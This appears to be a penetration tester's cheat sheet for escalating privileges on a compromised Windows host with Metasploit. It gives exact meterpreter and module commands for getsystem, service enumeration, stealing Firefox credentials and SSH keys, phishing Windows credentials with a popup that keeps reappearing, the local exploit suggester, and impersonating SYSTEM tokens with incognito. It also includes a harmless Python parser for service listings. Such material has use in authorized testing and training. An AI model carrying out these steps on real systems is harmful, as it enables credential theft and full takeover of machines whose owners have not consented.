privilege_escalation

Once we have exploited a Windows host we can try to become NT AUTHORITY\SYSTEM (or Administrator) by issuing getsystem: this meterpreter command tries several techniques to elevate privileges. It will not always work, though, so it is useful to know other enumeration techniques as well.

System Enumeration

We can check general information on the system with:

sysinfo

We can enumerate applications which are installed on the target machine:

use post/windows/gather/enum_applications
run

We can check which ports are open from meterpreter:

netstat

We can also enumerate services by dropping into a shell and doing:

sc queryex type= service
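
The output of sc queryex is verbose, so a small parser helps when triaging it. The following is an added example (not part of the original notes): it parses a constructed sample of sc queryex output into one record per service and lists the running ones with their PIDs.

```python
import re

# Constructed sample of `sc queryex type= service` output (not from a real host);
# the layout mirrors what sc.exe prints, trimmed to a few fields per service.
SAMPLE_SC_OUTPUT = """SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        PID                : 1416

SERVICE_NAME: wuauserv
DISPLAY_NAME: Windows Update
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        PID                : 0
"""

# "KEY : VALUE" lines; the value may be empty (e.g. FLAGS).
FIELD_RE = re.compile(r"^\s*([A-Z0-9_]+)\s*:\s*(.*?)\s*$")


def parse_sc_queryex(text):
    """Return one dict per service. A SERVICE_NAME line starts a record;
    lines without a colon (the STATE flags in parentheses) are
    continuations of the previous field."""
    services, current, last_key = [], None, None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2)
            if key == "SERVICE_NAME":
                current = {"SERVICE_NAME": value}
                services.append(current)
            elif current is not None:
                current[key] = value
            last_key = key
        elif current is not None and last_key and line.strip():
            current[last_key] += " " + line.strip()
    return services


def running_services(text):
    """(name, pid) for every service whose STATE is RUNNING."""
    return [
        (svc["SERVICE_NAME"], int(svc.get("PID", "0")))
        for svc in parse_sc_queryex(text)
        if "RUNNING" in svc.get("STATE", "")
    ]
```

Paste the real output of the command in place of the constructed sample to get the same structured view of the target's services.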

Notice that frameworks like Empire help with the enumeration and privilege escalation phases, since these can be quite time consuming.

Stealing Firefox Credentials

Another thing we can try is to steal Firefox credentials with:

use post/multi/gather/firefox_creds
options
set session 1
set decrypt true
run

Replace "1" with the id of your meterpreter session. If that does not work, accept the module's disclaimer and run it again:

set disclaimer true
run

If it still does not work, try again without decryption:

set decrypt false
set disclaimer false
run

We can also try to steal private SSH keys by doing:

use post/multi/gather/ssh_creds
set session 1
run

Phishing Windows Credentials

Another privilege escalation technique, once we already have an account on a Windows machine, is to ask the user for credentials; we can do this by issuing:

use post/windows/gather/phish_windows_credentials
run

A popup will now ask the user for credentials, and it keeps reappearing until they enter valid ones.

Of course, other privesc techniques rely on the presence of software such as WAMP, or of databases in general, whose contents we should try to dump in the hope of finding credentials.

Local Exploit Suggester

Another technique is to ask Metasploit for suggestions on exploits to use for privesc; we can do this by issuing:

use post/multi/recon/local_exploit_suggester
set session 1
run

We now get a list of the exploits likely to work, which we can try one by one.

Incognito Module

We can steal tokens; in theory these are similar to cookies, since they let us switch between Windows accounts without re-entering the password. We can do this by executing the following commands within the meterpreter session:

load incognito
help
list_tokens
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

We can verify if this was successful by issuing:

getuid